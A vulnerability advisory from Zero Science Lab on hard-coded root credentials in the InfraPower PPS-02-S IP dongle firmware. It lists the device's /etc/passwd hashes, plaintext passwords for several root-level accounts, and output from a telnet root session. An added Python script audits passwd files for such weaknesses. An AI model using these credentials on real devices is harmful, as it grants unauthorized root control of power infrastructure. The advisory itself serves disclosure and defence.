InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle
(IPD-02-S only) to remotely monitor the connected PDUs. Patented IP Dongle
provides IP remote access to the PDUs by a true network IP address chain.
Only 1 x IP dongle allows access to max. 16 PDUs in daisy chain, which is a
highly efficient application for saving not only the IP remote accessories
cost, but also the true IP addresses required on the PDU management.

Desc: InfraPower suffers from a use of hard-coded credentials. The IP dongle
firmware ships with hard-coded accounts that can be used to gain full system
access (root) using the telnet daemon on port 23.

Tested on: Linux 2.6.28 (armv5tel)
           lighttpd/1.4.30-devel-1321
           PHP/5.3.9
           SQLite/3.7.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php


27.09.2016

--


# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh


# showing accounts in root group:

Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311


# showing other less-privileged accounts:

Username: user
Password: 8475
--
Username: admin
Password: 8475

--------

/mnt/mtd # echo $SHELL
/sbin/root_shell.sh

/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24

# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
	login_file=/mnt/mtd/root_login
	now_timestamp=`date +%s`
	if [ -f $login_file ]; then
		line=`wc -l $login_file | cut -c 1-9`
		if [ "$line" != "0" ] && [ "$line" != "1" ] && [ "$line" != "2" ]; then
			pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
			pre_result1=`echo $pre_login | cut -d " " -f 1`
			pre_result2=`echo $pre_login | cut -d " " -f 2`
			pre_result3=`echo $pre_login | cut -d " " -f 3`
			if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
				pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
				result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
				if [ "$result" != "success" ]; then
					echo $result
					exit 0
				fi
			fi
		fi
	fi
	echo -n "password:"
	read pass
	if [ "$pass" != "999" ]; then
		echo "wrong password"
		echo fail $now_timestamp >> $login_file
		exit 0
	fi
	echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #

--------

/mnt/mtd # ls
IMG001.exe         boot.old.sh        load_config.log    main_conf          net_conf           passwd_conf        snmp_conf          web_conf
PDU3_ini           box_conf           log_memCheck.txt   main_conf.bak      net_conf.old       port_conf          snmpd.conf
PDU3_pol           info.zip           mac_addr           me_login           ntp_conf           private            start_service.log

--------

/mnt/mtd # df -h
Filesystem                Size      Used Available Use% Mounted on
tmpfs                   256.0M      4.0K    256.0M   0% /tmp
/dev/mtdblock1            1.4M     96.0K      1.3M   7% /mnt/mtd
/dev/mtdblock5            1.0M     60.0K    964.0K   6% /mnt/mtd1
/dev/mtdblock6            1.0M     60.0K    964.0K   6% /mnt/mtd2
/dev/mtdblock7            1.0M     60.0K    964.0K   6% /mnt/mtd3

--------

/www # ls -al
drwxr-xr-x    5 1013     1014             0 Jan 13 08:41 .
drwxr-xr-x   16 root     root             0 Nov 28 11:17 ..
-rwxr--r--    1 1013     1014          6875 Apr 22  2014 CSSSource.php
-rwxr--r--    1 1013     1014           291 Apr 22  2014 Config.php
-rwxr--r--    1 1013     1014          1685 Apr 22  2014 ConnPort.php
-rwxr--r--    1 1013     1014          5787 Apr 22  2014 FWUpgrade.php
-rwxr--r--    1 1013     1014          7105 Apr 22  2014 Firmware.php
-rwxr--r--    1 1013     1014         10429 Apr 22  2014 Function.php
drwxr-xr-x    2 1013     1014             0 Apr 22  2014 General
-rwxr--r--    1 1013     1014          1407 Apr 22  2014 Header.php
-rwxr--r--    1 1013     1014          6775 Apr 22  2014 IPSettings.php
drwxr-xr-x    2 1013     1014             0 Apr 22  2014 Images
drwxr-xr-x    2 1013     1014             0 Apr 22  2014 JavaScript
-rwxr--r--    1 1013     1014           408 Apr 22  2014 JavaSource.php
-rwxr--r--    1 1013     1014           849 Apr 22  2014 ListFile.php
-rwxr--r--    1 1013     1014         12900 Apr 22  2014 Login.php
-rwxr--r--    1 1013     1014           355 Apr 22  2014 Logout.php
-rwxr--r--    1 1013     1014           352 Apr 22  2014 Main_Config.php
-rwxr--r--    1 1013     1014          5419 Apr 22  2014 Menu.php
-rwxr--r--    1 1013     1014           942 Apr 22  2014 Menu_3.php
-rwxr--r--    1 1013     1014          4491 Apr 22  2014 Ntp.php
-rwxr--r--    1 1013     1014         23853 Apr 22  2014 OutletDetails.php
-rwxr--r--    1 1013     1014          1905 Apr 22  2014 OutletDetails_Ajax.php
-rwxr--r--    1 1013     1014         48411 Apr 22  2014 PDUDetails.php
-rwxr--r--    1 1013     1014          4081 Apr 22  2014 PDUDetails_Ajax_Details.php
-rwxr--r--    1 1013     1014          1397 Apr 22  2014 PDUDetails_Ajax_Outlet.php
-rwxr--r--    1 1013     1014         19165 Apr 22  2014 PDULog.php
-rwxr--r--    1 1013     1014         29883 Apr 22  2014 PDUStatus.php
-rwxr--r--    1 1013     1014          4418 Apr 22  2014 PDUStatus_Ajax.php
-rwxr--r--    1 1013     1014          7791 Apr 22  2014 PortSettings.php
-rwxr--r--    1 1013     1014         24696 Apr 22  2014 SNMP.php
-rwxr--r--    1 1013     1014         38253 Apr 22  2014 SensorDetails.php
-rwxr--r--    1 1013     1014         27210 Apr 22  2014 SensorStatus.php
-rwxr--r--    1 1013     1014          5984 Apr 22  2014 SensorStatus_Ajax.php
-rwxr--r--    1 1013     1014         40944 Apr 22  2014 System.php
-rwxr--r--    1 1013     1014          4373 Apr 22  2014 UploadEXE.php
-rwxr--r--    1 1013     1014          9460 Apr 22  2014 User.php
-rwxr--r--    1 1013     1014         23170 Apr 22  2014 WriteRequest.php
-rwxr--r--    1 1013     1014          8850 Apr 22  2014 WriteRequest_Ajax.php
-rwxr--r--    1 1013     1014         10811 Apr 22  2014 dball.php
-rwxr--r--    1 1013     1014           771 Apr 22  2014 doupgrate.php
-rwxr--r--    1 1013     1014            76 Apr 22  2014 index.php
-rwxr--r--    1 1013     1014            49 Apr 22  2014 nfs.sh
-rwxr--r--    1 1013     1014          5410 Apr 22  2014 production_test1.php
-rwxr--r--    1 1013     1014           723 Apr 22  2014 vaildate.php
-rwxr--r--    1 1013     1014           611 Apr 22  2014 wiseup.php
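An added firmware-audit check, not part of the advisory: a small Python script that parses a passwd dump and flags the weaknesses the /etc/passwd listing above exhibits (extra UID-0 accounts, real hashes kept in the world-readable passwd file instead of shadow, one hash shared by several accounts, and legacy 13-character DES crypt hashes). The sample input is constructed from the entries quoted in the advisory; the function names are my own.

```python
"""Audit an /etc/passwd dump for the weaknesses the advisory above demonstrates."""
from collections import defaultdict

# Sample input (constructed from the /etc/passwd entries quoted in the advisory).
SAMPLE_PASSWD = """\
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
"""

def parse_passwd(text):
    """Return (name, hash, uid, shell) tuples; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2].isdigit():
            entries.append((fields[0], fields[1], int(fields[2]), fields[6]))
    return entries

def audit_passwd(text):
    """Return a dict of findings; an empty dict means nothing suspicious was found."""
    entries = parse_passwd(text)
    findings = {}
    # 1. Any UID-0 account other than root is an additional, easily overlooked root login.
    extra_root = [n for n, _, uid, _ in entries if uid == 0 and n != "root"]
    if extra_root:
        findings["extra_uid0"] = extra_root
    # 2. Real hashes in the world-readable passwd file (instead of shadow) are exposed
    #    to every local user; group them to spot accounts that share one password.
    by_hash = defaultdict(list)
    for name, pw_hash, _, _ in entries:
        if pw_hash not in ("x", "*", "!", ""):
            by_hash[pw_hash].append(name)
    if by_hash:
        findings["hash_in_passwd"] = [n for names in by_hash.values() for n in names]
    shared = {h: names for h, names in by_hash.items() if len(names) > 1}
    if shared:
        findings["shared_hash"] = shared
    # 3. A 13-character hash without a '$' prefix is traditional DES crypt(3):
    #    8 significant characters, no real key stretching, cheap to brute-force.
    des = [n for n, h, _, _ in entries if len(h) == 13 and not h.startswith("$")]
    if des:
        findings["des_crypt"] = des
    return findings
```

Run it against the passwd file pulled from a firmware image (or the fixed release) to confirm that every finding category comes back empty.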